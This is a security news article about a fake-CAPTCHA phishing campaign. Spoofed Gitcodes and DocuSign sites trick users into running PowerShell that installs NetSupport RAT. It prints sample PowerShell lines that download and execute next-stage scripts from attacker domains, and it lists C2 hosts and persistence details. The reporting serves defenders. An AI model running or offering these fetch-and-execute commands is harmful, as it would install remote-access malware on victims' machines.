Security researchers have recently uncovered a devious malware campaign that employs fake CAPTCHA and “prove you’re human” screens on spoofed websites most notably, imitations of the Gitcodes and DocuSign platforms.
The carefully orchestrated campaign tricks users into executing malicious PowerShell scripts, ultimately installing NetSupport RAT (Remote Access Trojan) on their computers.
This technique capitalizes on users’ familiarity with online verification processes, making it exceptionally dangerous and difficult to detect.
The attack begins when a victim lands on a deceptive webpage, styled to look like a legitimate service such as a Gitcodes “paste tool” website or a DocuSign verification portal.
For example, the domain “gitcodes[.]org” presents itself as a popular code-sharing platform, while “docusign.sa[.]com” mimics the well-known e-signature provider.
Visitors are greeted by seemingly ordinary CAPTCHA prompts or verification requests, instructing them to confirm their humanity by copying a script and running it in the Windows Run prompt.
Once users copy the provided text and execute it via Win+R, a multi-stage PowerShell chain is launched.
The initial script is designed to mimic benign activity, often leveraging simple string concatenation and web requests to retrieve further payloads.
For instance, a typical first-stage script hosted on “gitcodes[.]org” might initiate a web request to a secondary domain, such as “tradingviewtool[.]com,” using a crafted user agent:
powershell$domain = "http://tradingviewtool.com/info2.php"
$ua = "TradingView"
Invoke-WebRequest -Uri $domain -UserAgent $ua -OutFile "C:\temp\next.ps1"
& "C:\temp\next.ps1"
Each subsequent stage typically performs similar actions, downloading and executing additional scripts from new domains, ultimately retrieving the NetSupport RAT payload.
The final stage ensures persistence by modifying the Windows Registry to execute a tampered version of “client32.exe” (disguised as “My Support”) at every logon, making removal difficult.
The DocuSign-spoofed variation adopts similar tactics but adds obfuscation.
The initial script delivered to the clipboard is often encoded using ROT13, a simple substitution cipher, to evade basic signature-based protections.
The user’s click on the fake CAPTCHA triggers an AJAX-based command-and-control (C2) mechanism, which polls a server-side script (“c.php”) every second until it receives confirmation that the user has run the script on their machine.
If the condition is met, the server responds, triggering a refresh and delivering a second-stage PowerShell payload:
powershell# Simplified representative sample for illustration
$url = "https://docusign.sa.com/verification/s.php?an=1"
Invoke-WebRequest -Uri $url -OutFile "$env:TEMP\stage2.ps1"
Start-Process -FilePath "powershell" -ArgumentList "-File $env:TEMP\stage2.ps1"
Multiple script stages are used to fetch additional files, such as “wbdims.exe” or “jp2launcher.exe,” which unpack and launch the NetSupport RAT executable.
Network activity logs and payload analyses indicate that the malware communicates with several servers, including “mhousecreative[.]com” and “170.130.55.203:443,” to complete its mission.
Other campaigns analyzed by security teams show a broadening scope, with identical code patterns appearing on spoofed sites for Okta, media apps, and even leveraging legitimate content-sharing platforms like GitHub and Discord for payload distribution.
This campaign underlines the escalating sophistication of phishing and malware delivery techniques.
The use of multi-stage downloads, obfuscation, and legitimate-looking prompts are designed to bypass both user caution and automated detection systems. Security experts strongly advise:
The NetSupport RAT, while a legitimate remote administration tool, is increasingly abused by threat actors for cyber espionage, data theft, and lateral movement within networks.
This “self-infect” method is reminiscent of both opportunistic and advanced persistent threat (APT) activity, and has been previously associated with groups such as FIN7, Scalert Goldfinch, and STORM-0408.
Security teams must remain vigilant, as attackers continually refine their techniques.
The recent campaign demonstrates that even seemingly simple “prove you’re human” checks can be deadly when combined with crafty scripting and user trust.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…